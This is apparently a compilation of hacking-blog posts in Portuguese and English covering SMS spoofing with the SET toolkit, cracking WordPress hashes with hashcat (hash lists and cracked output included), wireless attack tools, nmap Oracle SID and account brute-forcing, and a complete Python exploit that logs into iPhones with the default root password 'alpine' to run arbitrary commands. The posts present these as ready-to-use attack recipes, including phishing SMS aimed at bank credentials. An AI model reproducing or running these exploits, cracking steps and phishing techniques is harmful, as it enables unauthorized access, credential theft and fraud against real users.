Password security scanner tool

Password Security Scanner is a new utility that scans the passwords stored by popular Windows applications (Microsoft Outlook, Internet Explorer, Mozilla Firefox, and more…) and displays security information about all these passwords. The security information of every stored password includes the total number of characters, number of numeric characters, number of lowercase/uppercase characters, number of repeating characters, and password strength. You can use this tool to determine whether the passwords used by other users are secured enough, without watching the passwords themselves.

Password Security Scanner

Password Security Scanner

You can find more information about this new tool on this Web page.

SMS Spoofing Attack

Os cibercriminosos realizam autênticos mega-campanhas com essa técnica em massa SMS enviado para vários celulares e com táticas diferentes, como spoofing web do banco e vários modelos feitos “luva” para si, passou o banco, empresas de telefonia, mesmo um amigo ou parente.
Seu objetivo é que, através dos SMS recebidos você acessar uma URL maliciosa ou clonado e perde suas senhas ou de poupança € / $. Para começar iniciamos a ferramenta SET do backtrack, teremos o menu iniciar. Listados abaixo são a opção desejada, no nosso caso os ataques de engenharia social. Na foto ao lado que escolhemos a técnica de SMS Vector ataque de spoofing. Neste ponto, a ferramenta pergunta se você quer fazer ou usar um modelo definido pelo aplicativo.

Na imagem acima, a primeira coisa que pergunta é se o envio de SMS irá realizar em massa, ou seja, vários telefones ou, inversamente, de uma única célula, no nosso caso, será o envio de um telefone, o meu.

Agora começa a escolher o modelo definido, pode ser de Movistar, o banco, Vodafone, para este PoC escolher a opção número dez.

Para terminar o receptor receberá os SMS falsificado, como disse antes, os SMS pode induzir a vítima a fornecer seu banco de credenciais, e-mail, etc, ou a clicar em um URL malicioso para o download de software malicioso ou simplesmente um clonado web em que perder suas credenciais.

E “voila”, o SMS chega ao receptor, como você pode ver o atacante quer fazê-lo ver a vítima por tantos anos como cliente em sua empresa de telefonia ganhou chamadas gratuitas para sempre, fazendo com que o acesso a sua web maliciosas. By the way, para esclarecimentos a ferramenta não interpretar os acentos, não a letra Ñ como visto nas SMS recebidos.

Fonte: FluProject

Crack WordPress Password Hashes com hashcat

 

By default, WordPress password hashes are simply salted MD5 hashes. This is a piece of cake to crack by today’s security standards. hashcat is a great multi-threaded password hash cracker which can eat these hashes for dinner. I’ll show you how to crack WordPress password hashes!


1. First, install hashcat. In this example I am using Gentoo Linux which has hashcat available in portage, otherwise you can just download from the hashcat.net website.

Gentoo:

$ sudo emerge -av hashcat-bin

 


2. Next you will need to find a good dictionary or wordlist. An excellent wordlist is available fromhttp://360percents.com/wordlist

 

The English > Big Wordlist is good for starters. Download and unzip that wordlist. Note that most ‘serious’ hackers have their own wordlists which can be 10G or more in size.


3. Next, make a text file of the WordPress password hashes from the wp_user table from a WordPress database, each on a single line.

 

For example, a file hash.txt could look like this:

$P$BjsWoVfZrkl13QryXsLRCEOomnoQpW0 
$P$BcSda3/tRXQcRZMPj3cUI0jZJFdMgL0 
$P$BNclJc4wbM.vSjKPYxKggDPtw3siXQ0 
$P$BdPnevgAM4xzttiTM3cRkwKcBUiDi5/ 
$P$BXepaVhs0UByWfkLcu62b6ONB5aTkF/ 
$P$BLxxnkSnCdIgKrzRvY4iGNWiDlEiMX.
$P$BgwpDDhzFKOrGHM5GmOqaEYpbZBApm/
$P$BNs8eOvBh2VwGmrvv1LCMUkXVp3dOS0
$P$BbOM8PaeWt2C0p4yBXma1SqXCiayR20
$P$BsxzJ5q0tp2fSbNyZwV4Y2kfP10li41
$P$B4UxiYkCiE849SisjMi80Wq1Q5QT9j.
$P$B77uJ.fF0CS9uXK1.WRY3prnpDSSGP.
$P$BYENdJJ9xjnO1Op4k3JaTMwa0eG4lt1
$P$BrxrMRnrUpU0CWl1mPxvrI5u90D1Gf/
$P$B0lALHh4n0FPChliDSaFc.1MT.rV6Q.
$P$BszaNsPu/kf6F7p6eDlRBISPmE8Bgu/
$P$B9fyhT.lw.uyjPvGrHJfsxylMGHOjX0
$P$BimzaP3WIOqO8edQwfPirHYUPomyaS/
$P$BPAl90Cin9RVTORHXf48PAN/NPX2be1
$P$B6hicNqHWfJw3xig14Zx4Yho4ycstr1
$P$BG3QbfGAl82SsroCXhhTiE7elitggz1
$P$B6QFSS8HR1ShgM2KXpY7qVGzboC3tf0
$P$Bb54FItDf4yrJ5u3Rjydsk6cuIdH9s/
$P$BSrIn.qn9YxycturSoJflmyaF8qk8X/
$P$Bff71tsrNjnXL.hU1wuxpnmNg9QyiI.
$P$BJOpY.sfGkwoMUdN5FJymo6wsjnkul/

 


4. Run hashcat-cli* –help

Running hashcat-cli32.bin –help will show options. Pay particular attention to the Hash types as well as Attack modes.


Crack away!

 

5. Now run hashcat as follows:

$ hashcat-cli32.bin -m[hash type] -a[attack mode] hashfile.txt wordlist.list

One example:

$ hashcat-cli32.bin -m400 -a4 /home/stmiller/hash.txt /home/stmiller/eng_alnum_big.lst

Warning: hashcat-cli32.bin is running from /opt/hashcat-bin so be careful of relative paths.
Initializing hashcat v0.44 by atom with 8 threads and 32mb segment-size...

Added hashes from file /home/stmiller/hash.txt: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen

Input.Mode: Dict (/home/stmiller/eng_alnum_big.lst)
Index.....: 1/1 (segment), 520644 (words), 8035785 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.28k plains, - words
Progress..: 17/520644 (0.00%)
Running...: 00:00:01:27
Estimated.: --:--:--:--

Input.Mode: Dict (/home/stmiller/eng_alnum_big.lst)
Index.....: 1/1 (segment), 520644 (words), 8035785 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.28k plains, - words
Progress..: 17/520644 (0.00%)
Running...: 00:00:01:29
Estimated.: --:--:--:--

 

Now go get some coffee!


For an easy hash to crack, this this:

 

hash.txt = 85267b760313713f2e5d5fe11a83af03

$ hashcat-cli32.bin -m0 -a2 /home/stmiller/nobackup/wordlist/hash.txt /home/stmiller/nobackup/wordlist/Super-WPA 
Warning: hashcat-cli32.bin is running from /opt/hashcat-bin so be careful of relative paths.
Initializing hashcat v0.44 by atom with 8 threads and 32mb segment-size...

Added hashes from file /home/stmiller/nobackup/wordlist/hash.txt: 1 (1 salts)
Activating quick-digest mode for single-hash

NOTE: press enter for status-screen

Input.Mode: Dict (/home/stmiller/nobackup/wordlist/Super-WPA)
Index.....: 1/344 (segment), 3377508 (words), 33550344 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 1.74M plains, 427.26k words
Progress..: 470572/3377508 (13.93%)
Running...: 00:00:00:01
Estimated.: 00:00:00:06

Input.Mode: Dict (/home/stmiller/nobackup/wordlist/Super-WPA)
Index.....: 1/344 (segment), 3377508 (words), 33550344 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 1.25M plains, 9.42k words
Progress..: 3002901/3377508 (88.91%)
Running...: 00:00:05:19
Estimated.: 00:00:00:39

85267b760313713f2e5d5fe11a83af03:ladiesman
All hashes have been recovered

hashchat is multi-threaded so it works faster than johntheripper. A video card using oclhashcat-plus is even faster if you have an available high end video card. For a better wordlist, a few good ones are floating around on piratebay.

Ferramenta de Penetraçao Wireless complementares para Linux

WIPHERE:

 

Programas incluidos
– airmon-ng
– airodump-ng
– aireplay-ng
– aircrack-ng
– airdrop-ng (Precisa do directorio /pentest/wireless/airdrop-ng/)
– xterm
– crunch (Precisa do directorio /pentest/passwords/crunch)
– pyrit
– sslstrip
– arpspoof
– macchanger
– kate
– apache2 (Precisa do directorio /etc/init.d/apache2)
– ettercap
– firefox (Trivial)

Baixar

 

 

WIFITE:

 

successful WEP attack (after 90 seconds):

successful WPS attacks (after 17 hours):

 

Fonte: Link01 , Link02

PentesterLab

PentesterLab é uma iniciativa bem interessante quanto ao treinamento de pentest. E como ele funciona ?

Simples, há uma série de exercícios, todos focados em testes de intrusão para aplicações Web, onde o aluno aprenderá, na prática, como identificar e explorar uma série de  vulnerabilidades, e o mais importante – TUDO DE GRAÇA

algumas coisas bem legais sobre os treinamentos disponbilizados pelo pessoal da PentesterLab:

  • Tudo offline, quer dizer, vc baixa o material de estudos, incluindo as isos, sobe uma máquina virtual e manda bala.
  • Tudo de graça e ainda abrem espaço para o esclarecimento de algumas dúvidas
  • E eles tiveram a brilhante ideia de disponibilizar alguns de seus cursos, como exemplo este aqui, de forma online.

Vejam parte dos exercícios na imagem abaixo – clique nela, pois vc será redirecionado para o site onde poderá baixar todo o material para o curso:

307012_337300383064447_1365401923_n

Gostei bastante da ementa do treinamento focado em teste de intrusão de aplicações Web. Vejam só:

  • HTTP fundamentals for security: HTTP methods, requests, responses, encoding;
  • Web application fingerprinting and information gathering;
  • Detection and exploitation of the following vulnerabilities:
  • Web server issues,
  • SQL injection,
  • Cross-Site Scripting,
  • Cross-Site Request Forgery,
  • Directory traversal vulnerabilities,
  • Include vulnerabilities,
  • Authorisation bypass,
  • Code and commands execution vulnerabilities.

Para ter acesso a lista de treinamentos, que é vasta, e começar a estudar, basta acessar o seguinte link.

Fonte:CorujadeTI

Descobrindo contas de usuário no Oracle com o Nmap

aprendizado mesmo.

Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.

 

basta fazer o seguinte:

Execute o comando:

nmap --script oracle-sid-brute 192.168.0.12

O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL

ScreenHunter_06 Mar. 11 13.22

Feito isso basta executar o próximo comando:

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL 192.168.0.12

ScreenHunter_06 Mar. 11 13.27

 

Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.

Espero que tenham gostado da dica,

Fonte:Hernaneac

Exploit: IOS Remote Command Execution via ssh

Os dispositivos iOS permitem executar código remoto mediante ssh, D35m0nd142 fez um exploit demostrando esta ação.

 

Compartilho o link do 1137day e o código.

http://1337day.com/exploits/14805

#!/usr/bin/python
# When you've launched the command look the terminal
# This software work without Metasploit 
# Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Vendor Homepage: http://www.apple.com
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium

import paramiko 
import Tkinter 
from tkMessageBox import *
import sys
import os
print "******************************************************************"
print "*Apple iPhone iOS Default SSH Remote Command Execution exploit   *"
print "*                 Created by D35m0nd142                          *"
print "******************************************************************\n" 

root=Tkinter.Tk()
root.geometry("%dx%d" % (490,220))
def exploit():
 ssh = paramiko.SSHClient()
 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 ip_iphone=ip.get()
 ssh.connect(ip_iphone,username='root',password='alpine')
 cmd=command.get()
 stdin, stdout, stderr = ssh.exec_command(cmd)
 print stdout.readlines()
 ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack() 
 ssh.close()

root['bg']="black"
root.title("Apple iOS Default SSH Remote Command Execution exploit")
message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_label=Tkinter.Label(text="iPhone IP: ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
command_label=Tkinter.Label(text="Command to execute: ").pack()
command=Tkinter.StringVar()
command_entry=Tkinter.Entry(textvariable=command).pack()
launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()

Hacking Exposed 7: Network Security Secrets & Solutions, Seventh Edition

HAcking Exposed já virou sinônimo de livros sobre segurança e qualidade. A editora responsável se preocupa em muito no mantenimento de suas edições sempre atualizadas e escritas por profissionais de peso, com bagagem técnica.

Este livro, o qual poderá ser consultado a partir do seguinte link, é recomendado para aqueles que desejam aprender um pouco mais sobre segurança da informação.

Fonte:CorujaTI